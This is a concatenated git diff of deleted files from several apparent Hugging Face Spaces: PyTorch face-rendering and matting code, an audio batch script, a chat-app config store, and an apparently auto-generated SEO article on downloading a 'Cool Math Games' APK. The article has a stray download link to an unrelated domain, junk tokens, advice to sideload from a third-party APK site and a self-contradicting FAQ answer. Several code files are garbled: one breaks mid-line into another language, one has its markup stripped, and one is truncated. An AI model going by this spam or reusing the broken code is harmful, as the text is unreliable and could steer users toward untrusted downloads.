(Smaller is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 7358 | 5306 | 4868 | -|250000 | 9940 | 5826 | 5004 | -|500000 | 14220 | 7114 | 5202 | -|1000000 | 23708 | 9966 | 5620 | -|1400000 | 32252 | 11178 | 6056 | -|2000000 | - | 13978 | 6472 | -|4000000 | - | 23238 | 8284 | -|5500000 | - | 32188 | 9854 | -|8000000 | - | - | 12310 | -|16000000 | - | - | 19950 | -|29000000 | - | - | 32324 | diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/facerender/pirender/face_model.py b/spaces/fb700/chatglm-fitness-RLHF/src/facerender/pirender/face_model.py deleted file mode 100644 index 51692c3f28f08e91d6956efcf528f5be51764721..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/facerender/pirender/face_model.py +++ /dev/null @@ -1,178 +0,0 @@ -import functools -import torch -import torch.nn as nn -from .base_function import LayerNorm2d, ADAINHourglass, FineEncoder, FineDecoder - -def convert_flow_to_deformation(flow): - r"""convert flow fields to deformations. - - Args: - flow (tensor): Flow field obtained by the model - Returns: - deformation (tensor): The deformation used for warpping - """ - b,c,h,w = flow.shape - flow_norm = 2 * torch.cat([flow[:,:1,...]/(w-1),flow[:,1:,...]/(h-1)], 1) - grid = make_coordinate_grid(flow) - deformation = grid + flow_norm.permute(0,2,3,1) - return deformation - -def make_coordinate_grid(flow): - r"""obtain coordinate grid with the same size as the flow filed. - - Args: - flow (tensor): Flow field obtained by the model - Returns: - grid (tensor): The grid with the same size as the input flow - """ - b,c,h,w = flow.shape - - x = torch.arange(w).to(flow) - y = torch.arange(h).to(flow) - - x = (2 * (x / (w - 1)) - 1) - y = (2 * (y / (h - 1)) - 1) - - yy = y.view(-1, 1).repeat(1, w) - xx = x.view(1, -1).repeat(h, 1) - - meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2) - meshed = meshed.expand(b, -1, -1, -1) - return meshed - - -def warp_image(source_image, deformation): - r"""warp the input image according to the deformation - - Args: - source_image (tensor): source images to be warpped - deformation (tensor): deformations used to warp the images; value in range (-1, 1) - Returns: - output (tensor): the warpped images - """ - _, h_old, w_old, _ = deformation.shape - _, _, h, w = source_image.shape - if h_old != h or w_old != w: - deformation = deformation.permute(0, 3, 1, 2) - deformation = torch.nn.functional.interpolate(deformation, size=(h, w), mode='bilinear') - deformation = deformation.permute(0, 2, 3, 1) - return torch.nn.functional.grid_sample(source_image, deformation) - - -class FaceGenerator(nn.Module): - def __init__( - self, - mapping_net, - warpping_net, - editing_net, - common - ): - super(FaceGenerator, self).__init__() - self.mapping_net = MappingNet(**mapping_net) - self.warpping_net = WarpingNet(**warpping_net, **common) - self.editing_net = EditingNet(**editing_net, **common) - - def forward( - self, - input_image, - driving_source, - stage=None - ): - if stage == 'warp': - descriptor = self.mapping_net(driving_source) - output = self.warpping_net(input_image, descriptor) - else: - descriptor = self.mapping_net(driving_source) - output = self.warpping_net(input_image, descriptor) - output['fake_image'] = self.editing_net(input_image, output['warp_image'], descriptor) - return output - -class MappingNet(nn.Module): - def __init__(self, coeff_nc, descriptor_nc, layer): - super( MappingNet, self).__init__() - - 
self.layer = layer - nonlinearity = nn.LeakyReLU(0.1) - - self.first = nn.Sequential( - torch.nn.Conv1d(coeff_nc, descriptor_nc, kernel_size=7, padding=0, bias=True)) - - for i in range(layer): - net = nn.Sequential(nonlinearity, - torch.nn.Conv1d(descriptor_nc, descriptor_nc, kernel_size=3, padding=0, dilation=3)) - setattr(self, 'encoder' + str(i), net) - - self.pooling = nn.AdaptiveAvgPool1d(1) - self.output_nc = descriptor_nc - - def forward(self, input_3dmm): - out = self.first(input_3dmm) - for i in range(self.layer): - model = getattr(self, 'encoder' + str(i)) - out = model(out) + out[:,:,3:-3] - out = self.pooling(out) - return out - -class WarpingNet(nn.Module): - def __init__( - self, - image_nc, - descriptor_nc, - base_nc, - max_nc, - encoder_layer, - decoder_layer, - use_spect - ): - super( WarpingNet, self).__init__() - - nonlinearity = nn.LeakyReLU(0.1) - norm_layer = functools.partial(LayerNorm2d, affine=True) - kwargs = {'nonlinearity':nonlinearity, 'use_spect':use_spect} - - self.descriptor_nc = descriptor_nc - self.hourglass = ADAINHourglass(image_nc, self.descriptor_nc, base_nc, - max_nc, encoder_layer, decoder_layer, **kwargs) - - self.flow_out = nn.Sequential(norm_layer(self.hourglass.output_nc), - nonlinearity, - nn.Conv2d(self.hourglass.output_nc, 2, kernel_size=7, stride=1, padding=3)) - - self.pool = nn.AdaptiveAvgPool2d(1) - - def forward(self, input_image, descriptor): - final_output={} - output = self.hourglass(input_image, descriptor) - final_output['flow_field'] = self.flow_out(output) - - deformation = convert_flow_to_deformation(final_output['flow_field']) - final_output['warp_image'] = warp_image(input_image, deformation) - return final_output - - -class EditingNet(nn.Module): - def __init__( - self, - image_nc, - descriptor_nc, - layer, - base_nc, - max_nc, - num_res_blocks, - use_spect): - super(EditingNet, self).__init__() - - nonlinearity = nn.LeakyReLU(0.1) - norm_layer = functools.partial(LayerNorm2d, affine=True) - kwargs = {'norm_layer':norm_layer, 'nonlinearity':nonlinearity, 'use_spect':use_spect} - self.descriptor_nc = descriptor_nc - - # encoder part - self.encoder = FineEncoder(image_nc*2, base_nc, max_nc, layer, **kwargs) - self.decoder = FineDecoder(image_nc, self.descriptor_nc, base_nc, max_nc, layer, num_res_blocks, **kwargs) - - def forward(self, input_image, warp_image, descriptor): - x = torch.cat([input_image, warp_image], 1) - x = self.encoder(x) - gen_image = self.decoder(x, descriptor) - return gen_image diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/generate_batch.py b/spaces/fb700/chatglm-fitness-RLHF/src/generate_batch.py deleted file mode 100644 index 95f21526feea846977707e97394132d43225c02a..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/generate_batch.py +++ /dev/null @@ -1,120 +0,0 @@ -import os - -from tqdm import tqdm -import torch -import numpy as np -import random -import scipy.io as scio -import src.utils.audio as audio - -def crop_pad_audio(wav, audio_length): - if len(wav) > audio_length: - wav = wav[:audio_length] - elif len(wav) < audio_length: - wav = np.pad(wav, [0, audio_length - len(wav)], mode='constant', constant_values=0) - return wav - -def parse_audio_length(audio_length, sr, fps): - bit_per_frames = sr / fps - - num_frames = int(audio_length / bit_per_frames) - audio_length = int(num_frames * bit_per_frames) - - return audio_length, num_frames - -def generate_blink_seq(num_frames): - ratio = np.zeros((num_frames,1)) - frame_id = 0 - while frame_id in 
range(num_frames): - start = 80 - if frame_id+start+9<=num_frames - 1: - ratio[frame_id+start:frame_id+start+9, 0] = [0.5,0.6,0.7,0.9,1, 0.9, 0.7,0.6,0.5] - frame_id = frame_id+start+9 - else: - break - return ratio - -def generate_blink_seq_randomly(num_frames): - ratio = np.zeros((num_frames,1)) - if num_frames<=20: - return ratio - frame_id = 0 - while frame_id in range(num_frames): - start = random.choice(range(min(10,num_frames), min(int(num_frames/2), 70))) - if frame_id+start+5<=num_frames - 1: - ratio[frame_id+start:frame_id+start+5, 0] = [0.5, 0.9, 1.0, 0.9, 0.5] - frame_id = frame_id+start+5 - else: - break - return ratio - -def get_data(first_coeff_path, audio_path, device, ref_eyeblink_coeff_path, still=False, idlemode=False, length_of_audio=False, use_blink=True): - - syncnet_mel_step_size = 16 - fps = 25 - - pic_name = os.path.splitext(os.path.split(first_coeff_path)[-1])[0] - audio_name = os.path.splitext(os.path.split(audio_path)[-1])[0] - - - if idlemode: - num_frames = int(length_of_audio * 25) - indiv_mels = np.zeros((num_frames, 80, 16)) - else: - wav = audio.load_wav(audio_path, 16000) - wav_length, num_frames = parse_audio_length(len(wav), 16000, 25) - wav = crop_pad_audio(wav, wav_length) - orig_mel = audio.melspectrogram(wav).T - spec = orig_mel.copy() # nframes 80 - indiv_mels = [] - - for i in tqdm(range(num_frames), 'mel:'): - start_frame_num = i-2 - start_idx = int(80. * (start_frame_num / float(fps))) - end_idx = start_idx + syncnet_mel_step_size - seq = list(range(start_idx, end_idx)) - seq = [ min(max(item, 0), orig_mel.shape[0]-1) for item in seq ] - m = spec[seq, :] - indiv_mels.append(m.T) - indiv_mels = np.asarray(indiv_mels) # T 80 16 - - ratio = generate_blink_seq_randomly(num_frames) # T - source_semantics_path = first_coeff_path - source_semantics_dict = scio.loadmat(source_semantics_path) - ref_coeff = source_semantics_dict['coeff_3dmm'][:1,:70] #1 70 - ref_coeff = np.repeat(ref_coeff, num_frames, axis=0) - - if ref_eyeblink_coeff_path is not None: - ratio[:num_frames] = 0 - refeyeblink_coeff_dict = scio.loadmat(ref_eyeblink_coeff_path) - refeyeblink_coeff = refeyeblink_coeff_dict['coeff_3dmm'][:,:64] - refeyeblink_num_frames = refeyeblink_coeff.shape[0] - if refeyeblink_num_frames void; - update: (updater: (config: ChatConfig) => void) => void; -}; - -export type ModelConfig = ChatConfig["modelConfig"]; - -export const ALL_MODELS = [ - { - name: "gpt-4", - available: false, - }, - { - name: "gpt-4-0314", - available: false, - }, - { - name: "gpt-4-32k", - available: false, - }, - { - name: "gpt-4-32k-0314", - available: false, - }, - { - name: "gpt-3.5-turbo", - available: false, - }, - { - name: "gpt-3.5-turbo-0301", - available: false, - }, - { - name: "qwen-v1", // 通义千问 - available: true, - }, - { - name: "qwen-plus-v1", // 通义千问 - available: true, - }, - { - name: "ERNIE-Bot-turbo", // 文心一言 - available: true, - }, - { - name: "spark", // 讯飞星火 - available: false, - }, - { - name: "llama", // llama - available: false, - }, - { - name: "chatglm", // chatglm-6b - available: false, - }, -] as const; - -export const ALL_BOT = [ - { - name: "OpenAI (VIP)", - available: true, - }, - { - name: "OpenAI绘画 (VIP)", - available: false, - }, - { - name: "必应 (VIP)", - available: false, - }, - { - name: "必应绘画(VIP)", - available: false, - }, - { - name: "万卷 (VIP)", - available: false, - }, - { - name: "Lemur", - available: true, - }, -]; - -export type BotType = (typeof ALL_BOT)[number]["name"]; -export type ModelType = (typeof ALL_MODELS)[number]["name"]; - 
-export function limitNumber( - x: number, - min: number, - max: number, - defaultValue: number, -) { - if (typeof x !== "number" || isNaN(x)) { - return defaultValue; - } - - return Math.min(max, Math.max(min, x)); -} - -export function limitModel(name: string) { - return ALL_MODELS.some((m) => m.name === name && m.available) - ? name - : ALL_MODELS[4].name; -} - -export function limitBot(name: string) { - return ALL_BOT.some((m) => m.name === name && m.available) - ? name - : ALL_BOT[4].name; -} - -export const ModalConfigValidator = { - bot(x: string) { - return limitBot(x) as BotType; - }, - model(x: string) { - return limitModel(x) as ModelType; - }, - max_tokens(x: number) { - return limitNumber(x, 0, 32000, 2000); - }, - presence_penalty(x: number) { - return limitNumber(x, -2, 2, 0); - }, - temperature(x: number) { - return limitNumber(x, 0, 1, 1); - }, -}; - -export const useAppConfig = create()( - persist( - (set, get) => ({ - ...DEFAULT_CONFIG, - - reset() { - set(() => ({ ...DEFAULT_CONFIG })); - }, - - update(updater) { - const config = { ...get() }; - updater(config); - set(() => config); - }, - }), - { - name: StoreKey.Config, - version: 2, - migrate(persistedState, version) { - if (version === 2) return persistedState as any; - - const state = persistedState as ChatConfig; - state.modelConfig.sendMemory = true; - state.modelConfig.historyMessageCount = 4; - state.modelConfig.compressMessageLengthThreshold = 1000; - state.dontShowMaskSplashScreen = false; - - return state; - }, - }, - ), -); diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Cool Math Games APK A Free Brain-Training Site with Fun Logic Math and Strategy Mini Games for Everyone.md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/Cool Math Games APK A Free Brain-Training Site with Fun Logic Math and Strategy Mini Games for Everyone.md deleted file mode 100644 index 13ad5a6fb8f3603b9fe019a83c40ecf67090f974..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Cool Math Games APK A Free Brain-Training Site with Fun Logic Math and Strategy Mini Games for Everyone.md +++ /dev/null @@ -1,129 +0,0 @@ - -

      Cool Math Games Download APK: How to Play Fun and Educational Games on Your Android Device

      -

      Do you love playing casual games that also challenge your brain and improve your math skills? If so, you might have heard of Cool Math Games, a website that offers hundreds of fun and educational games for everyone. But did you know that you can also play Cool Math Games on your Android device? In this article, we will show you how to download Cool Math Games APK for Android, and how to play some of the most popular games on the app. Let's get started!

      -

      What are Cool Math Games?

      -

      A brief introduction to the website and the app

      -

      Cool Math Games is a website that was launched in 1997 by Karen Schneider, a math teacher who wanted to make math more fun and accessible for her students. The website features hundreds of games that cover various topics such as logic, strategy, puzzle, physics, trivia, and more. The games are designed to be kid-friendly, with no violence, empty action, or inappropriate language. They are also suitable for adults who want to exercise their brain and have some fun.

      -

      cool math games download apk


      Downloadhttps://gohhs.com/2uPvuP



      -

      In 2015, Cool Math Games released an official app for Android devices, which allows users to play their favorite games from the website on their mobile phones or tablets. The app is free to download and install, and it updates regularly with new games and features. The app has over 1 million downloads and 4.8K reviews on Google Play Store, and it is one of the most popular educational apps on the market.

      -

      The benefits of playing Cool Math Games

      -

      Playing Cool Math Games is not only fun, but also beneficial for your brain and your learning. Here are some of the benefits of playing Cool Math Games:

      -
        -
      • They improve your math skills by making you practice arithmetic, algebra, geometry, fractions, decimals, percentages, and more.
      • -
      • They enhance your logic and reasoning skills by making you solve problems, find patterns, plan strategies, and think creatively.
      • -
      • They boost your memory and concentration by making you remember facts, follow instructions, and focus on tasks.
      • -
      • They stimulate your curiosity and interest by making you explore different topics, themes, and genres.
      • -
      • They entertain you and make you happy by making you laugh, smile, and have fun.
      • -
      -

      How to Download Cool Math Games APK for Android

      -

      The steps to download and install the app from Google Play Store

      -

      The easiest way to download Cool Math Games APK for Android is to use Google Play Store. Here are the steps to do so:

      -
        -
      1. Open Google Play Store on your Android device.
      2. -
      3. Search for "Coolmath Games Fun Mini Games" or use this link to go directly to the app page.
      4. -
      5. Tap on "Install" and wait for the app to download and install on your device.
      6. -
      7. Tap on "Open" or find the app icon on your home screen or app drawer.
      8. -
      9. Enjoy playing Cool Math Games on your Android device!
      10. -
      -
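Optionally, if you also have a computer with the Android platform tools installed, you can confirm from the command line that the install completed. This is only an illustrative check: the `adb` commands below are standard, but the "coolmath" package-name fragment is an assumption, not the app's confirmed package id (on Windows, replace `grep -i` with `findstr /i`).

```shell
# Connect the device over USB with USB debugging enabled,
# then list installed packages and filter for the app.
adb devices
adb shell pm list packages | grep -i coolmath
```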

      The steps to download and install the app from APKCombo

      -

      If you cannot access Google Play Store or you want to download the app from another source, you can use APKCombo, a website that provides APK files for various apps and games. Here are the steps to do so:

      -
        -
      1. Open your web browser on your Android device and go to this link to access the Cool Math Games APK page on APKCombo.
      2. -
      3. Tap on "Download APK" and choose the version and size of the app that you want to download.
      4. -
      5. Wait for the app to download on your device. You may need to allow your browser to download files from unknown sources.
      6. -
      7. Once the download is complete, open the file manager on your device and find the downloaded APK file.
      8. -
      9. Tap on the file and follow the instructions to install the app on your device. You may need to enable the installation of apps from unknown sources in your settings.
      10. -
      11. Find the app icon on your home screen or app drawer and tap on it.
      12. -
      13. Enjoy playing Cool Math Games on your Android device!
      14. -
      -
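If you would rather sideload the downloaded APK from a computer instead of using the on-device file manager, the standard `adb install` command works as well. This is a sketch under assumptions: USB debugging must be enabled on the phone, and the file name below is only an example, not the actual name APKCombo gives the download.

```shell
# Run from the folder on your computer that contains the downloaded APK
# (the file name here is illustrative only).
adb install cool-math-games.apk
```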

      How to Play Cool Math Games on Your Android Device

      -

      The features and categories of the app

      -

      The Cool Math Games app has a simple and user-friendly interface that allows you to easily access and play hundreds of games. The app has the following features and categories:

      -
        -
      • A home screen that shows you the latest and most popular games, as well as some recommended games based on your preferences.
      • -
      • A menu button that lets you access the settings, feedback, help, and more options.
      • -
      • A search button that lets you find any game by name or keyword.
      • -
      • A category button that lets you browse games by different genres, such as logic, skill, numbers, strategy, trivia, physics, adventure, and more.
      • -
      • A favorites button that lets you save and access your favorite games anytime.
      • -
      • A history button that lets you see and replay your recently played games.
      • -
      -

      Some examples of popular games and how to play them

      -

      The Cool Math Games app has a variety of games that suit different tastes and levels. Here are some examples of popular games and how to play them:

      - - - - - - - -
      Game NameDescriptionHow to Play
      Fireboy and WatergirlA puzzle-platformer game where you control two characters with opposite elements and try to reach the exit of each level.Use the arrow keys to move Fireboy and the WASD keys to move Watergirl. Avoid hazards such as fire, water, green goo, and spikes. Collect gems and activate switches to unlock doors and platforms. Work together to reach the exit of each level as fast as possible.
      Run 3A running game where you control an alien who runs through a tunnel in space and tries to avoid falling into the void.Use the left and right arrow keys to move sideways and the spacebar to jump. Avoid gaps and obstacles in the tunnel. Collect power-ups and coins to unlock new characters and upgrades. Run as far as you can without falling off.
      Sugar SugarA drawing game where you have to draw lines to guide sugar into different cups.Use your mouse or finger to draw lines on the screen. The sugar will follow the lines and fall into the cups. Each cup has a number that indicates how much sugar it needs. You can also use filters, gravity switches, fans, and other tools to manipulate the sugar. Complete all levels with three stars.
      Parking FuryA driving game where you have to park different vehicles in various parking spots.Use the arrow keys or WASD keys to drive the vehicle. Use the spacebar to brake. Follow the yellow arrows to find your parking spot. Avoid hitting other cars or objects. Park your vehicle as fast and as accurately as possible.
      2048A math game where you have to slide tiles with numbers and combine them to reach 2048.Use the arrow keys or swipe on the screen to slide all tiles in one direction. When two tiles with the same number touch, they merge into one tile with their sum. Try to create a tile with 2048 before the board is full.
      -

      Conclusion

      -

      A summary of the main points and a call to action

      -

      Cool Math Games is a website and an app that offers hundreds of fun and educational games for everyone. You can play Cool Math Games on your Android device by downloading and installing the app from Google Play Store or APKCombo. You can enjoy playing various games that improve your math, logic, memory, and other skills. You can also explore different categories, save your favorites, and replay your history. Cool Math Games is a great way to have fun and learn at the same time. If you are looking for a cool math game to play right now, why not try one of the examples we mentioned above? Or you can search for any game you like on the app. You will surely find something that suits your taste and level. Download Cool Math Games APK for Android today and start playing!

      FAQs

      -

      Q1: Are Cool Math Games safe for kids?

      -

      A1: Yes, Cool Math Games are safe for kids. The games are designed to be kid-friendly, with no violence, empty action, or inappropriate language. They are also educational and beneficial for kids' learning and development.

      -

Q2: Do Cool Math Games require an internet connection?

      -

A2: Yes, Cool Math Games require an internet connection to play. However, some games can be played offline once they are loaded on your device.

      -


      -

      Q3: How can I contact the developers of Cool Math Games?

      -

      A3: You can contact the developers of Cool Math Games by using the feedback option on the app menu. You can also visit their website or their Facebook page to get in touch with them.

      -

      Q4: What are some alternatives to Cool Math Games?

      -

      A4: Some alternatives to Cool Math Games are:

      -
        -
      • Math Playground: A website and an app that offers math games, logic games, word problems, videos, and worksheets for grades 1-6.
      • -
      • Prodigy: A website and an app that offers an adaptive math learning platform that aligns with curriculum standards for grades 1-8.
      • -
      • BrainPOP: A website and an app that offers animated videos, quizzes, games, and activities for various subjects, including math, science, social studies, and more.
      • -
      -

      Q5: How can I rate and review Cool Math Games?

      -

      A5: You can rate and review Cool Math Games by using the rate option on the app menu. You can also leave a review on Google Play Store or APKCombo to share your feedback and experience with other users.

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/fffffu/bing/src/components/chat.tsx b/spaces/fffffu/bing/src/components/chat.tsx deleted file mode 100644 index a37ab1cc96ca2e6bfd9acbe313a8d946bfd5c3d4..0000000000000000000000000000000000000000 --- a/spaces/fffffu/bing/src/components/chat.tsx +++ /dev/null @@ -1,93 +0,0 @@ -'use client' - -import { useCallback, useEffect, useMemo, useState } from 'react' -import { useAtom } from 'jotai' -import Image from 'next/image' -import { cn } from '@/lib/utils' -import { ChatList } from '@/components/chat-list' -import { ChatPanel } from '@/components/chat-panel' -import { WelcomeScreen } from '@/components/welcome-screen' -import { ChatScrollAnchor } from '@/components/chat-scroll-anchor' -import { ToneSelector } from './tone-selector' -import { ChatHeader } from './chat-header' -import { ChatSuggestions } from './chat-suggestions' -import { bingConversationStyleAtom } from '@/state' -import { ButtonScrollToBottom } from '@/components/button-scroll-to-bottom' -import StopIcon from '@/assets/images/stop.svg' -import { useBing } from '@/lib/hooks/use-bing' -import { ChatMessageModel } from '@/lib/bots/bing/types' -import { ChatNotification } from './chat-notification' -import { Settings } from './settings' -import { ChatHistory } from './chat-history' - -export type ChatProps = React.ComponentProps<'div'> & { initialMessages?: ChatMessageModel[] } - -export default function Chat({ className }: ChatProps) { - - const [bingStyle, setBingStyle] = useAtom(bingConversationStyleAtom) - const { - messages, - sendMessage, - resetConversation, - stopGenerating, - setInput, - bot, - input, - generating, - isSpeaking, - uploadImage, - attachmentList, - setAttachmentList, - } = useBing() - - useEffect(() => { - window.scrollTo({ - top: document.body.offsetHeight, - behavior: 'smooth' - }) - }, []) - - return ( -
      - -
      - - - - {messages.length ? ( - <> - - - - - - {generating ? ( -
      - -
      - ) : null} - - ) : null} -
      - - -
      - ) -} diff --git a/spaces/fffiloni/Video-Matting-Anything/networks/m2ms/conv_sam.py b/spaces/fffiloni/Video-Matting-Anything/networks/m2ms/conv_sam.py deleted file mode 100644 index 8a5720c8c03daa9714e025e4cf7730d327557d48..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/Video-Matting-Anything/networks/m2ms/conv_sam.py +++ /dev/null @@ -1,189 +0,0 @@ -import logging -import torch.nn as nn -import torch -import torch.nn.functional as F -from networks import ops - -def conv5x5(in_planes, out_planes, stride=1, groups=1, dilation=1): - """5x5 convolution with padding""" - return nn.Conv2d(in_planes, out_planes, kernel_size=5, stride=stride, - padding=2, groups=groups, bias=False, dilation=dilation) - - -def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1): - """3x3 convolution with padding""" - return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, - padding=dilation, groups=groups, bias=False, dilation=dilation) - - -def conv1x1(in_planes, out_planes, stride=1): - """1x1 convolution""" - return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False) - - -class BasicBlock(nn.Module): - expansion = 1 - - def __init__(self, inplanes, planes, stride=1, upsample=None, norm_layer=None, large_kernel=False): - super(BasicBlock, self).__init__() - if norm_layer is None: - norm_layer = nn.BatchNorm2d - self.stride = stride - conv = conv5x5 if large_kernel else conv3x3 - # Both self.conv1 and self.downsample layers downsample the input when stride != 1 - if self.stride > 1: - self.conv1 = ops.SpectralNorm(nn.ConvTranspose2d(inplanes, inplanes, kernel_size=4, stride=2, padding=1, bias=False)) - else: - self.conv1 = ops.SpectralNorm(conv(inplanes, inplanes)) - self.bn1 = norm_layer(inplanes) - self.activation = nn.LeakyReLU(0.2, inplace=True) - self.conv2 = ops.SpectralNorm(conv(inplanes, planes)) - self.bn2 = norm_layer(planes) - self.upsample = upsample - - def forward(self, x): - identity = x - - out = self.conv1(x) - out = self.bn1(out) - out = self.activation(out) - - out = self.conv2(out) - out = self.bn2(out) - - if self.upsample is not None: - identity = self.upsample(x) - - out += identity - out = self.activation(out) - - return out - -class SAM_Decoder_Deep(nn.Module): - def __init__(self, nc, layers, block=BasicBlock, norm_layer=None, large_kernel=False, late_downsample=False): - super(SAM_Decoder_Deep, self).__init__() - self.logger = logging.getLogger("Logger") - if norm_layer is None: - norm_layer = nn.BatchNorm2d - self._norm_layer = norm_layer - self.large_kernel = large_kernel - self.kernel_size = 5 if self.large_kernel else 3 - - #self.inplanes = 512 if layers[0] > 0 else 256 - self.inplanes = 256 - self.late_downsample = late_downsample - self.midplanes = 64 if late_downsample else 32 - - self.conv1 = ops.SpectralNorm(nn.ConvTranspose2d(self.midplanes, 32, kernel_size=4, stride=2, padding=1, bias=False)) - self.bn1 = norm_layer(32) - self.leaky_relu = nn.LeakyReLU(0.2, inplace=True) - - self.upsample = nn.UpsamplingNearest2d(scale_factor=2) - self.tanh = nn.Tanh() - #self.layer1 = self._make_layer(block, 256, layers[0], stride=2) - self.layer2 = self._make_layer(block, 128, layers[1], stride=2) - self.layer3 = self._make_layer(block, 64, layers[2], stride=2) - self.layer4 = self._make_layer(block, self.midplanes, layers[3], stride=2) - - self.refine_OS1 = nn.Sequential( - nn.Conv2d(32, 32, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2, bias=False), - norm_layer(32), - self.leaky_relu, - 
nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2),) - - self.refine_OS4 = nn.Sequential( - nn.Conv2d(64, 32, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2, bias=False), - norm_layer(32), - self.leaky_relu, - nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2),) - - self.refine_OS8 = nn.Sequential( - nn.Conv2d(128, 32, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2, bias=False), - norm_layer(32), - self.leaky_relu, - nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2),) - - for m in self.modules(): - if isinstance(m, nn.Conv2d): - if hasattr(m, "weight_bar"): - nn.init.xavier_uniform_(m.weight_bar) - else: - nn.init.xavier_uniform_(m.weight) - elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - - # Zero-initialize the last BN in each residual branch, - # so that the residual branch starts with zeros, and each residual block behaves like an identity. - # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677 - for m in self.modules(): - if isinstance(m, BasicBlock): - nn.init.constant_(m.bn2.weight, 0) - - self.logger.debug(self) - - def _make_layer(self, block, planes, blocks, stride=1): - if blocks == 0: - return nn.Sequential(nn.Identity()) - norm_layer = self._norm_layer - upsample = None - if stride != 1: - upsample = nn.Sequential( - nn.UpsamplingNearest2d(scale_factor=2), - ops.SpectralNorm(conv1x1(self.inplanes + 4, planes * block.expansion)), - norm_layer(planes * block.expansion), - ) - elif self.inplanes != planes * block.expansion: - upsample = nn.Sequential( - ops.SpectralNorm(conv1x1(self.inplanes + 4, planes * block.expansion)), - norm_layer(planes * block.expansion), - ) - - layers = [block(self.inplanes + 4, planes, stride, upsample, norm_layer, self.large_kernel)] - self.inplanes = planes * block.expansion - for _ in range(1, blocks): - layers.append(block(self.inplanes, planes, norm_layer=norm_layer, large_kernel=self.large_kernel)) - - return nn.Sequential(*layers) - - def forward(self, x_os16, img, mask): - ret = {} - mask_os16 = F.interpolate(mask, x_os16.shape[2:], mode='bilinear', align_corners=False) - img_os16 = F.interpolate(img, x_os16.shape[2:], mode='bilinear', align_corners=False) - - x = self.layer2(torch.cat((x_os16, img_os16, mask_os16), dim=1)) # N x 128 x 128 x 128 - - x_os8 = self.refine_OS8(x) - - mask_os8 = F.interpolate(mask, x.shape[2:], mode='bilinear', align_corners=False) - img_os8 = F.interpolate(img, x.shape[2:], mode='bilinear', align_corners=False) - - x = self.layer3(torch.cat((x, img_os8, mask_os8), dim=1)) # N x 64 x 256 x 256 - - x_os4 = self.refine_OS4(x) - - mask_os4 = F.interpolate(mask, x.shape[2:], mode='bilinear', align_corners=False) - img_os4 = F.interpolate(img, x.shape[2:], mode='bilinear', align_corners=False) - - x = self.layer4(torch.cat((x, img_os4, mask_os4), dim=1)) # N x 32 x 512 x 512 - x = self.conv1(x) - x = self.bn1(x) - x = self.leaky_relu(x) # N x 32 x 1024 x 1024 - - x_os1 = self.refine_OS1(x) # N - - x_os4 = F.interpolate(x_os4, scale_factor=4.0, mode='bilinear', align_corners=False) - x_os8 = F.interpolate(x_os8, scale_factor=8.0, mode='bilinear', align_corners=False) - - x_os1 = (torch.tanh(x_os1) + 1.0) / 2.0 - x_os4 = (torch.tanh(x_os4) + 1.0) / 2.0 - x_os8 = (torch.tanh(x_os8) + 1.0) / 2.0 - - mask_os1 = F.interpolate(mask, x_os1.shape[2:], mode='bilinear', 
align_corners=False) - - ret['alpha_os1'] = x_os1 - ret['alpha_os4'] = x_os4 - ret['alpha_os8'] = x_os8 - ret['mask'] = mask_os1 - - return ret \ No newline at end of file diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/engine.io-parser/build/esm/contrib/base64-arraybuffer.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/engine.io-parser/build/esm/contrib/base64-arraybuffer.js deleted file mode 100644 index b54438472351942e375e3698b2a78ba8ca9260e0..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/engine.io-parser/build/esm/contrib/base64-arraybuffer.js +++ /dev/null @@ -1,43 +0,0 @@ -// imported from https://github.com/socketio/base64-arraybuffer -const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; -// Use a lookup table to find the index. -const lookup = typeof Uint8Array === 'undefined' ? [] : new Uint8Array(256); -for (let i = 0; i < chars.length; i++) { - lookup[chars.charCodeAt(i)] = i; -} -export const encode = (arraybuffer) => { - let bytes = new Uint8Array(arraybuffer), i, len = bytes.length, base64 = ''; - for (i = 0; i < len; i += 3) { - base64 += chars[bytes[i] >> 2]; - base64 += chars[((bytes[i] & 3) << 4) | (bytes[i + 1] >> 4)]; - base64 += chars[((bytes[i + 1] & 15) << 2) | (bytes[i + 2] >> 6)]; - base64 += chars[bytes[i + 2] & 63]; - } - if (len % 3 === 2) { - base64 = base64.substring(0, base64.length - 1) + '='; - } - else if (len % 3 === 1) { - base64 = base64.substring(0, base64.length - 2) + '=='; - } - return base64; -}; -export const decode = (base64) => { - let bufferLength = base64.length * 0.75, len = base64.length, i, p = 0, encoded1, encoded2, encoded3, encoded4; - if (base64[base64.length - 1] === '=') { - bufferLength--; - if (base64[base64.length - 2] === '=') { - bufferLength--; - } - } - const arraybuffer = new ArrayBuffer(bufferLength), bytes = new Uint8Array(arraybuffer); - for (i = 0; i < len; i += 4) { - encoded1 = lookup[base64.charCodeAt(i)]; - encoded2 = lookup[base64.charCodeAt(i + 1)]; - encoded3 = 